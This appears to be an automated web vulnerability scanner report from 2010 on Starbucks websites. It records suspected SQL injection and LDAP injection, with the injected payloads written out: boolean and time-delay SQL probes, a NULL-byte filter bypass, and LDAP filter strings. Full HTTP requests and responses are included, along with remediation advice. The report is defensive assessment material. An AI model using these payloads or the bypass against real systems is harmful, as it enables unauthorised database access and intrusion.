SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-reserve-coffee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 62476475'%20or%201%3d1--%20 and 62476475'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:35 GMT Connection: close Content-Length: 52660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <a href="/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi" title="Aged Sulawesi Kalosi"> <img src="http://assets.starbucks.com/assets/aa98bb468e8e4d11bcf9c7c5c337e4fd.jpg" alt="Aged Sulawesi Kalosi Stamp Art" /> <br /><strong><span>Aged Sulawesi Kalosi</span></strong> <br /><span class="family">Starbucks Reserve... Coffee </span> <br /><span class="intensity"></span> </a> </li>
<li class="specialty_roast"> <a href="/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry" title="Brazil Sul de Minas Peaberry"> <img src="http://assets.starbucks.com/assets/84a1915283354bf5af4293a62a6b3175.jpg" alt="Brazil Sul de Minas Peaberry Stamp Art" /> <br /><strong><span>Brazil Sul de Minas Peaberry</span></strong> <br /><span class="family">Starbucks Reserve... Coffee </span> <br /><span class="intensity"></span> </a> </li>
1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13312046'%20or%201%3d1--%20 and 13312046'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /coffee/via/instant-coffee?113312046'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:02 GMT Connection: close Content-Length: 53520
<li class="specialty_roast"> <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast"> <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Dec ...[SNIP]...
Request 2
GET /coffee/via/instant-coffee?113312046'%20or%201%3d2--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:02 GMT Connection: close Content-Length: 53065
<li class="specialty_roast"> <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast"> <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Decaf Italian Roast" /> <br /><strong><span>Decaf Italian Roast</span></strong> <br /><span class="family">Starbucks VIA.. Coffees</span> <br /><span class="intensity"></span> </a> </li>
</ol> </div>
<div class="section" id="posts">
<div id="blog-602" class="blog-entry"> <h2><a href="/blog/Perfect-your-Starbucks-VIA-Ready-Brew-Flavored-experience">Perfect Your Starbucks VI ...[SNIP]...
1.3. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/menu
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /menu?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:38:03 GMT Connection: close Content-Length: 72340
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /responsibility HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883%00'; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /error/ Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:14:43 GMT Connection: close Content-Length: 128
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ferror%2f">here</a>.</h2> </body></html>
Request 2
GET /responsibility HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883%00''; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:15:59 GMT Connection: close Content-Length: 56642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie. The application took 51339 milliseconds to respond to the request, compared with 260 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /responsibility/community/starbucks-foundation HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883')waitfor%20delay'0%3a0%3a20'--; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:42:07 GMT Connection: close Content-Length: 39480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The SITESERVER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SITESERVER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C'; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:25 GMT Connection: close Content-Length: 75
The page cannot be displayed because an internal server error has occurred.
Request 2
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C''; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 168 Content-Type: text/html Location: /coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/ Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:26 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/">here</a>.</body>
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<title>Contact Us - StarbucksStore.com</title> <script language="JavaScript1.2" type="text/javascript"><!-- function CheckInput(form) { var passed = true; if (form.cboSubjects){ if (form.cboSubjects.selectedIndex==0){ alert("Please select a subject and topic for your email."); passed = false; } } return passed; }
<!-- SiteCatalyst code version: G.6.Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp?error=noselection" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" var s_zip="" var s_events="" var s_products="" var s_purchaseID="" var s_eVar1="" var s_eVar2="" var s_eVar3="" var s_eVar4="" var s_eVar5="" var s_eVar6="" var s_eVar7="" var s_eVar8="" var s_eVar9="" var s_eVar10=""
<title>Contact Us - StarbucksStore.com</title> <script language="JavaScript1.2" type="text/javascript"><!-- function CheckInput(form) { var passed = true; if (form.cboSubjects){ if (form.cboSubjects.selectedIndex==0){ alert("Please select a subject and topic for your email."); passed = false; } } return passed; }
<!-- SiteCatalyst code version: G.6.Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp?error=noselection" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" var s_zip="" var s_events="" var s_products="" var s_purchaseID="" var s_eVar1="" var s_eVar2="" var s_eVar3="" var s_eVar4="" var s_eVar5="" var s_eVar6="" var s_eVar7="" var s_eVar8="" var s_eVar9="" var s_eVar10=""
var strURL = new String( ...[SNIP]...
2. LDAP injectionpreviousnext There are 4 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.
The payloads b04135e4d2d6b331)(sn=* and b04135e4d2d6b331)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21174 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:30 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Find every Starbucks Coffee at the Official Online Store."> <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title> Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store </title>
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21174 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDACABBACA=HOJMDLCBHPPELAMPENAAECCJ; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:30 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Find every Starbucks Coffee at the Official Online Store."> <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title> Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store </title>
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.
The payloads 1a18fdd9ce30786c)(sn=* and 1a18fdd9ce30786c)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 351 Content-Type: text/html Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDACABBACA=HCKMDLCBEBEEIOJHOPIJIEII; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:39 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE">here</a>.</body>
Request 2
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 351 Content-Type: text/html Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:39 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE">here</a>.</body>
The ASPSESSIONIDCCDDADAA cookie appears to be vulnerable to LDAP injection attacks.
The payloads c20c2704323c6dbe)(sn=* and c20c2704323c6dbe)!(sn=* were each submitted in the ASPSESSIONIDCCDDADAA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21102 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCDDADAA=GJHKDLCBKFNCFHEOPBDCFKDD; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:35 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store"> <meta name="keywords" content="coffee machines, espresso machines">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title>Coffee Machines at Starbucks Store</title>
The EMail.x parameter appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the EMail.x parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 164 Content-Type: text/html Location: /guestassist/shcontus.asp?error=noselection Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=MPCAELCBIKHIIOECBLPILHFA; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:24:51 GMT
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 164 Content-Type: text/html Location: /guestassist/shcontus.asp?error=noselection Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSCDCCADA=EODAELCBBDPKJGHJDMNGKJDP; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:24:52 GMT
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>
3. Cross-site scripting (reflected)previousnext There are 108 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
